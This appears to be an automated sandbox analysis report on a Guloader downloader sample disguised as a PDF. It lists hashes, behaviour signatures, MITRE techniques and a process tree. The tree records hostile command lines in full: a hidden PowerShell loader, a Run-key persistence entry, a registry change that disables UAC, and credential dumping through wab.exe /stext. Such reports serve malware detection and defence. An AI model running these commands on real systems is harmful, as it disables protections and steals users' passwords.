Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20240704-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-07-2024 09:49
Static task
- static1
Behavioral task behavioral1
- Sample: OD2J305312A-200805674H-2024090716pdf.exe
- Resource: win7-20240708-en
Behavioral task behavioral2
- Sample: OD2J305312A-200805674H-2024090716pdf.exe
- Resource: win10v2004-20240704-en
General
- Target: OD2J305312A-200805674H-2024090716pdf.exe
- Size: 387KB
- MD5: 06e45d2db3c52517fc7139b3b32a4742
- SHA1: 602ab4e85c1506af02d51e144298bac3aea331ca
- SHA256: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
- SHA512: 32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
- SSDEEP: 12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures

Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

UAC bypass
Processes (description | ioc | process):
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
NirSoft MailPassView (1 IoC)
Password recovery tool for various email clients
Processes (resource | yara_rule):
behavioral2/memory/3752-75-0x0000000000400000-0x0000000000462000-memory.dmp | MailPassView

NirSoft WebBrowserPassView (1 IoC)
Password recovery tool for various web browsers
Processes (resource | yara_rule):
behavioral2/memory/2692-74-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView

Nirsoft (3 IoCs)
Processes (resource | yara_rule):
behavioral2/memory/2692-74-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
behavioral2/memory/3752-75-0x0000000000400000-0x0000000000462000-memory.dmp | Nirsoft
behavioral2/memory/4728-73-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell and hides the display window.

Accesses Microsoft Outlook accounts (1 TTP, 1 IoC)
Processes (description | ioc | process):
Key opened | \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | wab.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description | ioc | process):
Set value (str) | \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" | reg.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes (pid | process):
2700 | wab.exe
2700 | wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes (pid | process):
3176 | powershell.exe
2700 | wab.exe

Suspicious use of SetThreadContext (4 IoCs)
Processes (description | pid | process | target process):
PID 3176 set thread context of 2700 | 3176 | powershell.exe | wab.exe
PID 2700 set thread context of 2692 | 2700 | wab.exe | wab.exe
PID 2700 set thread context of 3752 | 2700 | wab.exe | wab.exe
PID 2700 set thread context of 4728 | 2700 | wab.exe | wab.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTP, 2 IoCs)

Suspicious behavior: EnumeratesProcesses (16 IoCs)
Processes (pid | process | entries):
3176 | powershell.exe | 10
4728 | wab.exe | 2
2692 | wab.exe | 4

Suspicious behavior: MapViewOfSection (4 IoCs)
Processes (pid | process | entries):
3176 | powershell.exe | 1
2700 | wab.exe | 3

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description | pid | process):
Token: SeDebugPrivilege | 3176 | powershell.exe
Token: SeDebugPrivilege | 4728 | wab.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes (pid | process):
2700 | wab.exe

Suspicious use of WriteProcessMemory (32 IoCs)
Processes (description | pid | process | target process | entries):
PID 1568 wrote to memory of 3176 | 1568 | OD2J305312A-200805674H-2024090716pdf.exe | powershell.exe | 3
PID 3176 wrote to memory of 2700 | 3176 | powershell.exe | wab.exe | 5
PID 2700 wrote to memory of 2936 | 2700 | wab.exe | cmd.exe | 3
PID 2936 wrote to memory of 3672 | 2936 | cmd.exe | reg.exe | 3
PID 2700 wrote to memory of 4464 | 2700 | wab.exe | cmd.exe | 3
PID 4464 wrote to memory of 3932 | 4464 | cmd.exe | reg.exe | 3
PID 2700 wrote to memory of 2692 | 2700 | wab.exe | wab.exe | 4
PID 2700 wrote to memory of 3752 | 2700 | wab.exe | wab.exe | 4
PID 2700 wrote to memory of 4728 | 2700 | wab.exe | wab.exe | 4
Processes (indentation shows the parent/child tree)

PID 1568: C:\Users\Admin\AppData\Local\Temp\OD2J305312A-200805674H-2024090716pdf.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\OD2J305312A-200805674H-2024090716pdf.exe"
  - Suspicious use of WriteProcessMemory
  PID 3176: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 2700: C:\Program Files (x86)\windows mail\wab.exe
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID 2936: C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
        - Suspicious use of WriteProcessMemory
        PID 3672: C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
          - Adds Run key to start application
          - Modifies registry key
      PID 4464: C:\Windows\SysWOW64\cmd.exe
        Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        - Suspicious use of WriteProcessMemory
        PID 3932: C:\Windows\SysWOW64\reg.exe
          Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key
      PID 2692: C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\guatvonppz"
        - Suspicious behavior: EnumeratesProcesses
      PID 3752: C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qwflvgxjdhpgl"
        - Accesses Microsoft Outlook accounts
      PID 4728: C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bqkwwyilrphknjcjg"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

PID 2960: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4164,i,270339169963605285,17552719617811964021,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Downloads